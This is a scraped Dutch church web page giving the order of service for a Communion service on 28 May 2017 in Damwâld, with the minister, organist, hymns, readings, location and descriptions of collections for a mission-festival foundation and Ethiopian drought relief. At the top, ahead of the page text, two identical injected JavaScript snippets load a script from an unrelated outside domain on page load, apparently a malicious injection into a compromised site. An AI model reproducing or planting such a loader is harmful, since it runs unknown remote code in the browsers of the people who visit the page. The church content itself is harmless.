;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 mei 2017 11:00 uur - PKN Damwâld
zondag 28 mei 2017
11:00 uur
Viering Heilig Avondmaal

Kerkdienst zondag 28 mei 2017 11:00 uur

Informatie

Voorganger:Ds. A. Elverdink, Eastermar
Organist:Nienke van der Heide-Visser
Mededeling:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Gz. 234
Welkom en mededelingen
Intochtslied Psalm 68: 2
Onze Hulp en Groet .
We zingen: Elb 140
Gebed .
We lezen: Johannes 14: 1 – 9; 15 – 19 en 22, 23
Collecte
We zingen: ELB 178: 1, 4
Preek
We zingen: Gez. 323: 2, 8
Inleiding op het Avondmaal
We zingen: ELB 302
Gebeden
Rondgaan van brood en wijn
We zingen: Gez. 358: 6
Slotlied Gez. 77: 1, 3, 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting Zendingsfeesten Veenklooster

Deze collecte is bestemd voor financiële ondersteuning van de te houden zendingsfeesten in het Pinksterweekend in Veenklooster. In 1973 is gestart met het organiseren van een zendingsfeest rond de Pinksterdagen in Veenklooster. Stichting Zendingsfeesten Veenklooster is een Christelijke organisatie die is ontstaan uit de Protestantse Kerken van Kollumerzwaag en omstreken. Op 25 januari 2000 is de Stichting Zendingsfeesten Veenklooster officieel opgericht als Stichting en zijn de statuten vastgesteld.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte Noodhulp en preventie Ethiopië

De extreme droogte in Ethiopië houdt aan. Waterbronnen staan leeg. Oogsten mislukken en vee sterft. In 2017 hebben meer dan 5 miljoen mensen dringend hulp nodig. Ze zijn afhankelijk van noodhulp: voedsel, water en voedingssupplementen. Meer dan 300.000 kinderen zijn in acuut levensgevaar door honger. Kerk in Actie verleent noodhulp, en vergroot de weerbaarheid van mensen door hen beter voor te bereiden op rampen. Kerk in Actie biedt via de plaatselijke kerk in Ethiopië extra hulp aan de meest kwetsbare groepen, zoals kinderen, (zwangere) vrouwen en ouderen. Belangrijkste doel is honger tegengaan, ondervoeding behandelen, en zorgen voor toegang tot veilig (drink) water. In die gebieden waar de droogte minder extreem is, versterkt Kerk in Actie de weerbaarheid van mensen en ondersteunt hun bestaanszekerheid. Kerk in Actie traint en coacht kerkelijke partners in Ethiopië. Zij maken mensen beter bestand tegen deze rampen. Boeren en herders leren wateropslagplaatsen herstellen en ondergrondse waterputten aanleggen. Boeren en boerinnen leren gewassen verbouwen die tegen droogte bestand zijn. De situatie in Ethiopië is bijzonder schrijnend en levensbedreigend voor miljoenen mensen. Uw steun is hard nodig.